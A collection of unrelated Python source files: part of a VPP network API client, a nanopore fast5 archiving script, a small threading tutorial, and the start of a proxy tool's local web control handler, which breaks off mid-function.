return metaclass(cls.__name__, cls.__bases__, cls.__dict__.copy())
return wrapper
class VppEnumType(type):
def __getattr__(cls, name):
t = vpp_get_type(name)
return t.enum
@metaclass(VppEnumType)
class VppEnum(object):
pass
def vpp_atexit(vpp_weakref):
"""Clean up VPP connection on shutdown."""
vpp_instance = vpp_weakref()
if vpp_instance and vpp_instance.transport.connected:
vpp_instance.logger.debug('Cleaning up VPP on exit')
vpp_instance.disconnect()
if sys.version[0] == '2':
def vpp_iterator(d):
return d.iteritems()
else:
def vpp_iterator(d):
return d.items()
def call_logger(msgdef, kwargs):
s = 'Calling {}('.format(msgdef.name)
for k, v in kwargs.items():
s += '{}:{} '.format(k, v)
s += ')'
return s
def return_logger(r):
s = 'Return from {}'.format(r)
return s
class VppApiDynamicMethodHolder(object):
pass
class FuncWrapper(object):
def __init__(self, func):
self._func = func
self.__name__ = func.__name__
self.__doc__ = func.__doc__
def __call__(self, **kwargs):
return self._func(**kwargs)
def __repr__(self):
return '<FuncWrapper(func=<%s(%s)>)>' % (self.__name__, self.__doc__)
class VPPApiError(Exception):
pass
class VPPNotImplementedError(NotImplementedError):
pass
class VPPIOError(IOError):
pass
class VPPRuntimeError(RuntimeError):
pass
class VPPValueError(ValueError):
pass
class VPPApiClient(object):
"""VPP interface.
This class provides the APIs to VPP. The APIs are loaded
from provided .api.json files and makes functions accordingly.
These functions are documented in the VPP .api files, as they
are dynamically created.
Additionally, VPP can send callback messages; this class
provides a means to register a callback function to receive
these messages in a background thread.
"""
apidir = None
VPPApiError = VPPApiError
VPPRuntimeError = VPPRuntimeError
VPPValueError = VPPValueError
VPPNotImplementedError = VPPNotImplementedError
VPPIOError = VPPIOError
def process_json_file(self, apidef_file):
api = json.load(apidef_file)
types = {}
for t in api['enums']:
t[0] = 'vl_api_' + t[0] + '_t'
types[t[0]] = {'type': 'enum', 'data': t}
for t in api['unions']:
t[0] = 'vl_api_' + t[0] + '_t'
types[t[0]] = {'type': 'union', 'data': t}
for t in api['types']:
t[0] = 'vl_api_' + t[0] + '_t'
types[t[0]] = {'type': 'type', 'data': t}
for t, v in api['aliases'].items():
types['vl_api_' + t + '_t'] = {'type': 'alias', 'data': v}
self.services.update(api['services'])
i = 0
while True:
unresolved = {}
for k, v in types.items():
t = v['data']
if not vpp_get_type(k):
if v['type'] == 'enum':
try:
VPPEnumType(t[0], t[1:])
except ValueError:
unresolved[k] = v
elif v['type'] == 'union':
try:
VPPUnionType(t[0], t[1:])
except ValueError:
unresolved[k] = v
elif v['type'] == 'type':
try:
VPPType(t[0], t[1:])
except ValueError:
unresolved[k] = v
elif v['type'] == 'alias':
try:
VPPTypeAlias(k, t)
except ValueError:
unresolved[k] = v
if len(unresolved) == 0:
break
if i > 3:
raise VPPValueError('Unresolved type definitions {}'
.format(unresolved))
types = unresolved
i += 1
for m in api['messages']:
try:
self.messages[m[0]] = VPPMessage(m[0], m[1:])
except VPPNotImplementedError:
self.logger.error('Not implemented error for {}'.format(m[0]))
def __init__(self, apifiles=None, testmode=False, async_thread=True,
logger=None, loglevel=None,
read_timeout=5, use_socket=False,
server_address='/run/vpp-api.sock'):
"""Create a VPP API object.
apifiles is a list of files containing API
descriptions that will be loaded - methods will be
dynamically created reflecting these APIs. If not
provided this will load the API files from VPP's
default install location.
logger, if supplied, is the logging logger object to log to.
loglevel, if supplied, is the log level this logger is set
to report at (from the loglevels in the logging module).
"""
if logger is None:
logger = logging.getLogger(__name__)
if loglevel is not None:
logger.setLevel(loglevel)
self.logger = logger
self.messages = {}
self.services = {}
self.id_names = []
self.id_msgdef = []
self.header = VPPType('header', [['u16', 'msgid'],
['u32', 'client_index']])
self.apifiles = []
self.event_callback = None
self.message_queue = queue.Queue()
self.read_timeout = read_timeout
self.async_thread = async_thread
self.event_thread = None
self.testmode = testmode
self.use_socket = use_socket
self.server_address = server_address
self._apifiles = apifiles
if use_socket:
from . vpp_transport_socket import VppTransport
else:
from . vpp_transport_shmem import VppTransport
if not apifiles:
# Pick up API definitions from default directory
try:
apifiles = self.find_api_files()
except RuntimeError:
# In test mode we don't care that we can't find the API files
if testmode:
apifiles = []
else:
raise VPPRuntimeError
for file in apifiles:
with open(file) as apidef_file:
self.process_json_file(apidef_file)
self.apifiles = apifiles
# Basic sanity check
if len(self.messages) == 0 and not testmode:
raise VPPValueError(1, 'Missing JSON message definitions')
self.transport = VppTransport(self, read_timeout=read_timeout,
server_address=server_address)
# Make sure we allow VPP to clean up the message rings.
atexit.register(vpp_atexit, weakref.ref(self))
class ContextId(object):
"""Multiprocessing-safe provider of unique context IDs."""
def __init__(self):
self.context = mp.Value(ctypes.c_uint, 0)
self.lock = mp.Lock()
def __call__(self):
"""Get a new unique (or, at least, not recently used) context."""
with self.lock:
self.context.value += 1
return self.context.value
get_context = ContextId()
def get_type(self, name):
return vpp_get_type(name)
@classmethod
def find_api_dir(cls):
"""Attempt to find the best directory in which API definition
files may reside. If the value VPP_API_DIR exists in the environment
then it is first on the search list. If we're inside a recognized
location in a VPP source tree (src/scripts and src/vpp-api/python)
then entries from there to the likely locations in build-root are
added. Finally the location used by system packages is added.
:returns: A single directory name, or None if no such directory
could be found.
"""
dirs = [cls.apidir] if cls.apidir else []
# perhaps we're in the 'src/scripts' or 'src/vpp-api/python' dir;
# in which case, plot a course to likely places in the src tree
import __main__ as main
if hasattr(main, '__file__'):
# get the path of the calling script
localdir = os.path.dirname(os.path.realpath(main.__file__))
else:
# use cwd if there is no calling script
localdir = os.getcwd()
localdir_s = localdir.split(os.path.sep)
def dmatch(dir):
"""Match dir against right-hand components of the script dir"""
d = dir.split('/') # param 'dir' assumes a / separator
length = len(d)
return len(localdir_s) > length and localdir_s[-length:] == d
def sdir(srcdir, variant):
"""Build a path from srcdir to the staged API files of
'variant' (typically '' or '_debug')"""
# Since 'core' and 'plugin' files are staged
# in separate directories, we target the parent dir.
return os.path.sep.join((
srcdir,
'build-root',
'install-vpp%s-native' % variant,
'vpp',
'share',
'vpp',
'api',
))
srcdir = None
if dmatch('src/scripts'):
srcdir = os.path.sep.join(localdir_s[:-2])
elif dmatch('src/vpp-api/python'):
srcdir = os.path.sep.join(localdir_s[:-3])
elif dmatch('test'):
# we're apparently running tests
srcdir = os.path.sep.join(localdir_s[:-1])
if srcdir:
# we're in the source tree, try both the debug and release
# variants.
dirs.append(sdir(srcdir, '_debug'))
dirs.append(sdir(srcdir, ''))
# Test for staged copies of the scripts
# For these, since we explicitly know if we're running a debug versus
# release variant, target only the relevant directory
if dmatch('build-root/install-vpp_debug-native/vpp/bin'):
srcdir = os.path.sep.join(localdir_s[:-4])
dirs.append(sdir(srcdir, '_debug'))
if dmatch('build-root/install-vpp-native/vpp/bin'):
srcdir = os.path.sep.join(localdir_s[:-4])
dirs.append(sdir(srcdir, ''))
# finally, try the location system packages typically install into
dirs.append(os.path.sep.join(('', 'usr', 'share', 'vpp', 'api')))
# check the directories for existence; first one wins
for dir in dirs:
if os.path.isdir(dir):
return dir
return None
@classmethod
def find_api_files(cls, api_dir=None, patterns='*'):
"""Find API definition files from the given directory tree with the
given pattern. If no directory is given then find_api_dir() is used
to locate one. If no pattern is given then all definition files found
in the directory tree are used.
:param api_dir: A directory tree in which to locate API definition
files; subdirectories are descended into.
If this is None then find_api_dir() is called to discover it.
:param patterns: A list of patterns to use in each visited directory
when looking for files.
This can be a list/tuple object or a comma-separated string of
patterns. Each value in the list will have leading/trialing
whitespace stripped.
The pattern specifies the first part of the filename, '.api.json'
is appended.
The results are de-duplicated, thus overlapping patterns are fine.
If this is None it defaults to '*' meaning "all API files".
:returns: A list of file paths for the API files found.
"""
if api_dir is None:
api_dir = cls.find_api_dir()
if api_dir is None:
raise VPPApiError("api_dir cannot be located")
if isinstance(patterns, list) or isinstance(patterns, tuple):
patterns = [p.strip() + '.api.json' for p in patterns]
else:
patterns = [p.strip() + '.api.json' for p in patterns.split(",")]
api_files = []
for root, dirnames, files in os.walk(api_dir):
# iterate all given patterns and de-dup the result
files = set(sum([fnmatch.filter(files, p) for p in patterns], []))
for filename in files:
api_files.append(os.path.join(root, filename))
return api_files
@property
def api(self):
if not hasattr(self, "_api"):
raise VPPApiError("Not connected, api definitions not available")
return self._api
def make_function(self, msg, i, multipart, do_async):
if (do_async):
def f(**kwargs):
return self._call_vpp_async(i, msg, **kwargs)
else:
def f(**kwargs):
return self._call_vpp(i, msg, multipart, **kwargs)
f.__name__ = str(msg.name)
f.__doc__ = ", ".join(["%s %s" %
(msg.fieldtypes[j], k)
for j, k in enumerate(msg.fields)])
f.msg = msg
return f
def _register_functions(self, do_async=False):
self.id_names = [None] * (self.vpp_dictionary_maxid + 1)
self.id_msgdef = [None] * (self.vpp_dictionary_maxid + 1)
self._api = VppApiDynamicMethodHolder()
for name, msg in vpp_iterator(self.messages):
n = name + '_' + msg.crc[2:]
i = self.transport.get_msg_index(n.encode('utf-8'))
if i > 0:
self.id_msgdef[i] = msg
self.id_names[i] = name
# Create function for client side messages.
if name in self.services:
if 'stream' in self.services[name] and \
self.services[name]['stream']:
multipart = True
else:
multipart = False
f = self.make_function(msg, i, multipart, do_async)
setattr(self._api, name, FuncWrapper(f))
else:
self.logger.debug(
'No such message type or failed CRC checksum: %s', n)
def connect_internal(self, name, msg_handler, chroot_prefix, rx_qlen,
do_async):
pfx = chroot_prefix.encode('utf-8') if chroot_prefix else None
rv = self.transport.connect(name.encode('utf-8'), pfx,
msg_handler, rx_qlen)
if rv != 0:
raise VPPIOError(2, 'Connect failed')
self.vpp_dictionary_maxid = self.transport.msg_table_max_index()
self._register_functions(do_async=do_async)
# Initialise control ping
crc = self.messages['control_ping'].crc
self.control_ping_index = self.transport.get_msg_index(
('control_ping' + '_' + crc[2:]).encode('utf-8'))
self.control_ping_msgdef = self.messages['control_ping']
if self.async_thread:
self.event_thread = threading.Thread(
target=self.thread_msg_handler)
self.event_thread.daemon = True
self.event_thread.start()
else:
self.event_thread = None
return rv
def connect(self, name, chroot_prefix=None, do_async=False, rx_qlen=32):
"""Attach to VPP.
name - the name of the client.
chroot_prefix - if VPP is chroot'ed, the prefix of the jail
do_async - if true, messages are sent without waiting for a reply
rx_qlen - the length of the VPP message receive queue between
client and server.
"""
msg_handler = self.transport.get_callback(do_async)
return self.connect_internal(name, msg_handler, chroot_prefix, rx_qlen,
do_async)
def connect_sync(self, name, chroot_prefix=None, rx_qlen=32):
"""Attach to VPP in synchronous mode. Application must poll for events.
name - the name of the client.
chroot_prefix - if VPP is chroot'ed, the prefix of the jail
rx_qlen - the length of the VPP message receive queue between
client and server.
"""
return self.connect_internal(name, None, chroot_prefix, rx_qlen,
do_async=False)
def disconnect(self):
"""Detach from VPP."""
rv = self.transport.disconnect()
if self.event_thread is not None:
self.message_queue.put("terminate event thread")
return rv
def msg_handler_sync(self, msg):
"""Process an incoming message from VPP in sync mode.
The message may be a reply or it may be an async notification.
"""
r = self.decode_incoming_msg(msg)
if r is None:
return
# If we have a context, then use the context to find any
# request waiting for a reply
context = 0
if hasattr(r, 'context') and r.context > 0:
context = r.context
if context == 0:
# No context -> async notification that we feed to the callback
self.message_queue.put_nowait(r)
else:
raise VPPIOError(2, 'RPC reply message received in event handler')
def has_context(self, msg):
if len(msg) < 10:
return False
header = VPPType('header_with_context', [['u16', 'msgid'],
['u32', 'client_index'],
['u32', 'context']])
(i, ci, context), size = header.unpack(msg, 0)
if self.id_names[i] == 'rx_thread_exit':
return
#
# Decode message and returns a tuple.
#
msgobj = self.id_msgdef[i]
if 'context' in msgobj.field_by_name and context >= 0:
return True
return False
def decode_incoming_msg(self, msg, no_type_conversion=False):
if not msg:
self.logger.warning('vpp_api.read failed')
return
(i, ci), size = self.header.unpack(msg, 0)
if self.id_names[i] == 'rx_thread_exit':
return
#
# Decode message and returns a tuple.
#
msgobj = self.id_msgdef[i]
if not msgobj:
raise VPPIOError(2, 'Reply message undefined')
r, size = msgobj.unpack(msg, ntc=no_type_conversion)
return r
def msg_handler_async(self, msg):
"""Process a message from VPP in async mode.
In async mode, all messages are returned to the callback.
"""
r = self.decode_incoming_msg(msg)
if r is None:
return
msgname = type(r).__name__
if self.event_callback:
self.event_callback(msgname, r)
def _control_ping(self, context):
"""Send a ping command."""
self._call_vpp_async(self.control_ping_index,
self.control_ping_msgdef,
context=context)
def validate_args(self, msg, kwargs):
d = set(kwargs.keys()) - set(msg.field_by_name.keys())
if d:
raise VPPValueError('Invalid argument {} to {}'
.format(list(d), msg.name))
def _call_vpp(self, i, msgdef, multipart, **kwargs):
"""Given a message, send the message and await a reply.
msgdef - the message packing definition
i - the message type index
multipart - True if the message returns multiple
messages in return.
context - context number - chosen at random if not
supplied.
The remainder of the kwargs are the arguments to the API call.
The return value is the message or message array containing
the response. It will raise an IOError exception if there was
no response within the timeout window.
"""
if 'context' not in kwargs:
context = self.get_context()
kwargs['context'] = context
else:
context = kwargs['context']
kwargs['_vl_msg_id'] = i
no_type_conversion = kwargs.pop('_no_type_conversion', False)
try:
if self.transport.socket_index:
kwargs['client_index'] = self.transport.socket_index
except AttributeError:
pass
self.validate_args(msgdef, kwargs)
logging.debug(call_logger(msgdef, kwargs))
b = msgdef.pack(kwargs)
self.transport.suspend()
self.transport.write(b)
if multipart:
# Send a ping after the request - we use its response
# to detect that we have seen all results.
self._control_ping(context)
# Block until we get a reply.
rl = []
while (True):
msg = self.transport.read()
if not msg:
raise VPPIOError(2, 'VPP API client: read failed')
r = self.decode_incoming_msg(msg, no_type_conversion)
msgname = type(r).__name__
if context not in r or r.context == 0 or context != r.context:
# Message being queued
self.message_queue.put_nowait(r)
continue
if not multipart:
rl = r
break
if msgname == 'control_ping_reply':
break
rl.append(r)
self.transport.resume()
logger.debug(return_logger(rl))
return rl
def _call_vpp_async(self, i, msg, **kwargs):
"""Given a message, send the message and await a reply.
msgdef - the message packing definition
i - the message type index
context - context number - chosen at random if not
supplied.
The remainder of the kwargs are the arguments to the API call.
"""
if 'context' not in kwargs:
context = self.get_context()
kwargs['context'] = context
else:
context = kwargs['context']
try:
if self.transport.socket_index:
kwargs['client_index'] = self.transport.socket_index
except AttributeError:
kwargs['client_index'] = 0
kwargs['_vl_msg_id'] = i
b = msg.pack(kwargs)
self.transport.write(b)
def register_event_callback(self, callback):
"""Register a callback for async messages.
This will be called for async notifications in sync mode,
and all messages in async mode. In sync mode, replies to
requests will not come here.
callback is a fn(msg_type_name, msg_type) that will be
called when a message comes in. While this function is
executing, note that (a) you are in a background thread and
may wish to use threading.Lock to protect your datastructures,
and (b) message processing from VPP will stop (so if you take
a long while about it you may provoke reply timeouts or cause
VPP to fill the RX buffer). Passing None will disable the
callback.
"""
self.event_callback = callback
def thread_msg_handler(self):
"""Python thread calling the user registered message handler.
This is to emulate the old style event callback scheme. Modern
clients should provide their own thread to poll the event
queue.
"""
while True:
r = self.message_queue.get()
if r == "terminate event thread":
break
msgname = type(r).__name__
if self.event_callback:
self.event_callback(msgname, r)
def __repr__(self):
return "<VPPApiClient apifiles=%s, testmode=%s, async_thread=%s, " \
"logger=%s, read_timeout=%s, use_socket=%s, " \
"server_address='%s'>" % (
self._apifiles, self.testmode, self.async_thread,
self.logger, self.read_timeout, self.use_socket,
self.server_address)
# Provide the old name for backward compatibility.
VPP = VPPApiClient
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
nanopype_import.py
|
# \SCRIPT\-------------------------------------------------------------------------
#
# CONTENTS : Snakemake nanopore data pipeline
#
# DESCRIPTION : Import raw fast5 from MinKNOW to nanopype packages
#
# RESTRICTIONS : none
#
# REQUIRES : none
#
# ---------------------------------------------------------------------------------
# Copyright (c) 2018-2020, Pay Giesselmann, Max Planck Institute for Molecular Genetics
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Written by Pay Giesselmann
# ---------------------------------------------------------------------------------
# imports
import os, sys, glob, re, enum
import time, datetime
import argparse
import h5py, tarfile
import threading
import queue
from collections import deque
from multiprocessing import Process, Queue
from watchdog.events import RegexMatchingEventHandler
# simple logging
class logger():
logs = [sys.stdout]
class log_type(enum.Enum):
Error = "[ERROR]"
Warning = "[WARNING]"
Info = "[INFO]"
Debug = "[DEBUG]"
log_types = []
def init(file=None, log_types=[log_type.Error, log_type.Info]):
if file:
if os.path.isfile(file) and os.access(file, os.W_OK) or os.access(os.path.abspath(os.path.dirname(file)), os.W_OK):
logger.logs.append(file)
logger.log_types = log_types
logger.log("Logger created")
if file and len(logger.logs) == 1:
logger.log("Log-file {file} is not accessible".format(file=file), logger.log_type.Error)
def log(message, type=log_type.Info):
if type in logger.log_types:
print_message = ' '.join([datetime.datetime.now().strftime("%d.%m.%Y %H:%M:%S"), str(type.value), message])
for log in logger.logs:
if isinstance(log, str):
with open(log, 'a') as fp:
print(print_message, file = fp)
else:
print(print_message, file = log)
# file system watchdog
class fs_event_handler(RegexMatchingEventHandler):
def __init__(self, base_dir, regexes=['.*'], on_create=None, on_modify=None, on_delete=None):
super().__init__(regexes=regexes, ignore_directories=True)
self.on_create = on_create if callable(on_create) else None
self.on_modify = on_modify if callable(on_modify) else None
self.on_delete = on_delete if callable(on_delete) else None
self.base_dir = base_dir
def on_created(self, event):
if self.on_create:
self.on_create(event.src_path)
def on_moved(self, event):
if self.on_create and self.base_dir in event.dest_path:
self.on_create(event.dest_path)
def on_modified(self, event):
if self.on_modify:
self.on_modify(event.src_path)
def on_deleted(self, event):
if self.on_delete:
self.on_delete(event.src_path)
# thread safe file queue
class delay_queue(object):
def __init__(self):
self.__keys = {}
self.__values = deque()
self.__lock = threading.Lock()
def __len__(self):
with self.__lock:
return len(self.__values)
def put(self, obj):
self.delay(obj, update=False)
def delay(self, obj, update=True):
with self.__lock:
if update and obj in self.__keys:
self.__values.remove(obj)
self.__keys[obj] = time.time()
self.__values.append(obj)
def delete(self, obj):
with self.__lock:
if obj in self.__keys:
self.__values.remove(obj)
del self.__keys[obj]
def pop(self, t=0):
t_now = time.time()
with self.__lock:
while len(self.__values) and t_now - self.__keys[obj] > t:
obj = self.__values.popleft()
del self.__keys[obj]
yield obj
# watch filesystem for incoming target files, provide iterator interface on files
class fs_watchdog():
def __init__(self, src_dirs, regexes):
self.fs_queue = delay_queue()
self.src_dirs = list(src_dirs)
self.regexes = regexes
self.fs_event_handler = []
self.fs_observer = []
def start(self, recursive=True):
if len(self.fs_observer):
self.stop()
for src_dir in self.src_dirs:
self.fs_event_handler.append(fs_event_handler(src_dir,
self.regexes,
on_create=self.fs_queue.put,
on_modify=self.fs_queue.delay,
on_delete=self.fs_queue.delete))
self.fs_observer.append(Observer())
self.fs_observer[-1].schedule(self.fs_event_handler[-1], path=src_dir, recursive=recursive)
self.fs_observer[-1].start()
logger.log("Start file system observer on {target}".format(target=src_dir))
def stop(self):
logger.log("Stopping file system observer")
for obs in self.fs_observer:
obs.stop()
obs.join()
logger.log("Stopped file system observer")
def files(self, t=0):
return self.fs_queue.pop(t)
# package files to batch tar archives
class packager():
def __init__(self, src_dirs, dst_dir, recursive=True, ignore_existing=False, regexes=['.*'], batch_size=4000):
self.src_dirs = src_dirs
self.dst_dir = dst_dir
self.recursive = recursive
self.ignore_existing = ignore_existing
self.regexes = regexes
self.batch_size = batch_size
self.file_queue = Queue()
self.__packager = None
def __get_src__(self):
pattern = '|'.join([r for r in self.regexes])
existing = []
for src_dir in self.src_dirs:
if self.recursive:
existing.extend([os.path.join(dirpath, f) for dirpath, _, files in os.walk(src_dir) for f in files if re.match(pattern, f)])
else:
existing.extend([os.path.join(src_dir, f) for f in os.listdir(src_dir) if re.match(pattern, f)])
return {os.path.basename(f):f for f in existing}
def __get_tar__(self):
tarfiles = [os.path.abspath(os.path.join(self.dst_dir, f)) for f in os.listdir(self.dst_dir) if re.match("[0-9]*.tar", f)]
return tarfiles
def __get_dst__(self):
tarfiles = self.__get_tar__()
existing = {}
for tf in tarfiles:
with tarfile.open(tf) as tar:
tar_members = tar.getmembers()
existing.update({tar_member.name:os.path.join(tf, tar_member.name) for tar_member in tar_members})
return existing
def __write_tar__(self, fname, batch):
n = 0
with tarfile.open(fname, 'w') as fp:
for f in batch:
if os.path.isfile(f):
fp.add(f, arcname=os.path.basename(f))
n += 1
return n
def start(self):
if self.__packager:
self.__packager.join()
self.__packager = Process(target=self.__run__, )
self.__packager.start()
def stop(self):
self.file_queue.put(None) # poison pill exit
self.__packager.join()
self.__packager = None
def put(self, src_file):
self.file_queue.put(os.path.abspath(src_file))
def __run__(self):
try:
# get existing src/dest files
logger.log("Inspect existing files and archives")
dst_files = self.__get_dst__()
src_files = self.__get_src__()
batch_count = max([0] + [int(os.path.basename(s)[:-4]) + 1 for s in self.__get_tar__()])
# update on meanwhile queued files from watchdog
active = True
try:
f = self.file_queue.get(block=False)
while f:
src_files[os.path.basename(f)] = f
f = self.file_queue.get(block=False)
if not f: # poison pill exit on input queue
active = False
except queue.Empty as ex:
pass
except KeyboardInterrupt:
logger.log("Stop inspection on user request")
return
# put not yet archived to processing queue
processing_queue = deque()
src_keys = set(src_files.keys())
dst_keys = set(dst_files.keys())
to_archive = src_keys.difference(dst_keys)
archived = dst_keys.intersection(src_keys)
archived_only = dst_keys.difference(src_keys)
logger.log("{archived} raw files already archived".format(archived=len(archived)))
logger.log("{to_archive} raw files to be archived".format(to_archive=len(to_archive)))
if len(archived_only) > 0:
logger.log("{archived_only} files in archive but not found in source directory".format(archived_only=len(archived_only)), logger.log_type.Warning)
if not self.ignore_existing:
logger.log("Exiting with files in archive not found in source directory. Re-run with --ignore_existing to archive anyway")
return
processing_queue.extend(sorted([src_files[f] for f in to_archive]))
# enter main archive loop
while active:
# get file names from queue
try:
try:
f = self.file_queue.get(block=False)
while f:
processing_queue.append(f)
f = self.file_queue.get(block=False)
if f is None: # poison pill exit
active = False
except queue.Empty as ex:
pass
# archive files in batches
while len(processing_queue) >= self.batch_size:
batch = [processing_queue.popleft() for i in range(self.batch_size)]
batch_name = os.path.join(self.dst_dir, str(batch_count) + '.tar')
try:
n = self.__write_tar__(batch_name, batch)
except KeyboardInterrupt:
logger.log("Archiving of {archive} interrupted. The file is likely damaged".format(archive=batch_name))
raise
batch_count += 1
logger.log("Archived {count} reads in {archive}".format(count=n, archive=batch_name))
except KeyboardInterrupt:
# leave controlled shutdown to master process
break
# archive remaining reads
while len(processing_queue) > 0:
batch = [processing_queue.popleft() for i in range(min(len(processing_queue), self.batch_size))]
batch_name = os.path.join(self.dst_dir, str(batch_count) + '.tar')
if len(batch) > 0:
n = self.__write_tar__(batch_name, batch)
logger.log("Archived {count} reads in {archive}".format(count=n, archive=batch_name))
batch_count += 1
except KeyboardInterrupt:
logger.log("Archive worker shutdown on user request")
return
if __name__ == '__main__':
# cmd arguments
parser = argparse.ArgumentParser(description="Nanopype raw data import script",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("output", help="Export directory")
parser.add_argument("input", nargs="+", help="Import directories")
parser.add_argument("-f", "--filter", nargs="+", default=[".*\.fast5"], help="File filter regex")
parser.add_argument("-b", "--batch_size", type=int, default=4000, help="Number of files to put into one archive")
parser.add_argument("--recursive", action="store_true", help="Recursivly scan import directory")
parser.add_argument("--watch", action="store_true", help="Watch input for incoming files")
parser.add_argument("-l", "--log", default=None, help="Log file")
parser.add_argument("--grace_period", type=int, default=60, help="Time in seconds before treating a file as final")
parser.add_argument("--ignore_existing", action="store_true", help="Proceed with files found in archive but not in import location")
args = parser.parse_args()
# start logging
logger.init(file=args.log, log_types=[logger.log_type.Error, logger.log_type.Info, logger.log_type.Debug] )
# check output Directory
dir_out = os.path.abspath(args.output)
if not (dir_out.endswith('reads') or dir_out.endswith('reads' + os.sep)):
dir_out = os.path.join(dir_out, 'reads')
if os.path.isdir(dir_out):
if not os.access(dir_out, os.W_OK):
logger.log("Output directory existent but not writeable", logger.log_type.Error)
else:
try:
os.makedirs(dir_out, mode=0o744, exist_ok=True)
except FileExistsError:
print("Could not create output directory, file {file} already exists".format(file=dir_out), logger.log_type.Error)
exit(-1)
logger.log("Writing output to {output}".format(output=dir_out), logger.log_type.Info)
# check input
input_dirs = [os.path.abspath(f) for f in args.input if os.path.isdir(f) and os.access(f, os.R_OK)]
if len(input_dirs) == 0:
logger.log("No readable input directory specified", logger.log_type.Error)
exit(-1)
# create packager
pkgr = packager(input_dirs, dir_out, recursive=args.recursive, ignore_existing=args.ignore_existing, regexes=args.filter, batch_size=args.batch_size)
pkgr.start()
# create fs watchdogs
if args.watch:
from watchdog.observers import Observer
from watchdog.events import RegexMatchingEventHandler
wtchdg = fs_watchdog(input_dirs, args.filter)
wtchdg.start()
logger.log("Started file system observer, press CTRL + C to abort")
try:
while True:
for f in wtchdg.files(t=args.grace_period):
pkgr.put(f)
except KeyboardInterrupt:
logger.log("Abort by user, trying to shutdown properly")
wtchdg.stop()
try:
pkgr.stop()
except KeyboardInterrupt:
pkgr.stop() # packager has received interrupt and will shutdown
logger.log("Mission accomplished")
|
threading_learning_1.py
|
# threading模块创建多线程的第一种方式是把一个函数传入并创建Thread实例,然后调用start方法开始执行
# 第二种方法是直接从threading.Tread继承并创建线程类,然后重写__init__方法和run方法
# 下面是第一种
import random
import time
import threading
# 新线程执行的代码
def thread_run(urls):
print("Current %s is running..." % threading.current_thread().name)
for url in urls:
print("%s ----------> %s" % (threading.current_thread().name, url))
time.sleep(random.random())
print("%s ended." % threading.current_thread().name)
if __name__ == '__main__':
print("%s is running..." % threading.current_thread().name)
t1 = threading.Thread(target=thread_run, name='Thread_1', args=(['url_1', 'url_2', 'url_3'],))
t2 = threading.Thread(target=thread_run, name='Thread_2', args=(['url_4', 'url_5', 'url_6'],))
# 开始执行
t1.start()
t2.start()
t1.join()
t2.join()
print("%s ended." % threading.current_thread().name)
|
web_control.py
|
#!/usr/bin/env python
# coding:utf-8
import os, sys
current_path = os.path.dirname(os.path.abspath(__file__))
if __name__ == "__main__":
python_path = os.path.abspath( os.path.join(current_path, os.pardir, 'python27', '1.0'))
noarch_lib = os.path.abspath( os.path.join(python_path, 'lib', 'noarch'))
sys.path.append(noarch_lib)
import re
import socket, ssl
import urlparse
import threading
import urllib2
import time
root_path = os.path.abspath(os.path.join(current_path, os.pardir))
import yaml
import json
from instances import xlog
import module_init
import config
import autorun
import update_from_github
import simple_http_server
from simple_i18n import SimpleI18N
NetWorkIOError = (socket.error, ssl.SSLError, OSError)
i18n_translator = SimpleI18N(config.get(['language'], None))
module_menus = {}
class Http_Handler(simple_http_server.HttpServerHandler):
deploy_proc = None
def load_module_menus(self):
global module_menus
new_module_menus = {}
#config.load()
modules = config.get(['modules'], None)
for module in modules:
values = modules[module]
if module != "launcher" and config.get(["modules", module, "auto_start"], 0) != 1: # skip php_proxy module
continue
menu_path = os.path.join(root_path, module, "web_ui", "menu.yaml") # launcher & gae_proxy modules
if not os.path.isfile(menu_path):
continue
# i18n code lines (Both the locale dir & the template dir are module-dependent)
locale_dir = os.path.abspath(os.path.join(root_path, module, 'lang'))
stream = i18n_translator.render(locale_dir, menu_path)
module_menu = yaml.load(stream)
new_module_menus[module] = module_menu
module_menus = sorted(new_module_menus.iteritems(), key=lambda (k,v): (v['menu_sort_id']))
#for k,v in self.module_menus:
# xlog.debug("m:%s id:%d", k, v['menu_sort_id'])
def do_POST(self):
refer = self.headers.getheader('Referer')
if refer:
refer_loc = urlparse.urlparse(refer).netloc
host = self.headers.getheader('host')
if refer_loc != host:
xlog.warn("web control ref:%s host:%s", refer_loc, host)
return
#url_path = urlparse.urlparse(self.path).path
url_path_list = self.path.split('/')
if len(url_path_list) >= 3 and url_path_list[1] == "module":
module = url_path_list[2]
if len(url_path_list) >= 4 and url_path_list[3] == "control":
if module not in module_init.proc_handler:
xlog.warn("request %s no module in path", self.path)
self.send_not_found()
return
path = '/' + '/'.join(url_path_list[4:])
controler = module_init.proc_handler[module]["imp"].local.web_control.ControlHandler(self.client_address, self.headers, self.command, path, self.rfile, self.wfile)
controler.do_POST()
return
def do_GET(self):
refer = self.headers.getheader('Referer')
if refer:
refer_loc = urlparse.urlparse(refer).netloc
host = self.headers.getheader('host')
if refer_loc != host:
xlog.warn("web control ref:%s host:%s", refer_loc, host)
return
# check for '..', which will leak file
if re.search(r'(\.{2})', self.path) is not None:
self.wfile.write(b'HTTP/1.1 404\r\n\r\n')
xlog.warn('%s %s %s haking', self.address_string(), self.command, self.path )
return
url_path = urlparse.urlparse(self.path).path
if url_path == '/':
return self.req_index_handler()
url_path_list = self.path.split('/')
if len(url_path_list) >= 3 and url_path_list[1] == "module":
module = url_path_list[2]
if len(url_path_list) >= 4 and url_path_list[3] == "control":
if module not in module_init.proc_handler:
xlog.warn("request %s no module in path", url_path)
self.send_not_found()
return
if "imp" not in module_init.proc_handler[module]:
xlog.warn("request module:%s start fail", module)
self.send_not_found()
return
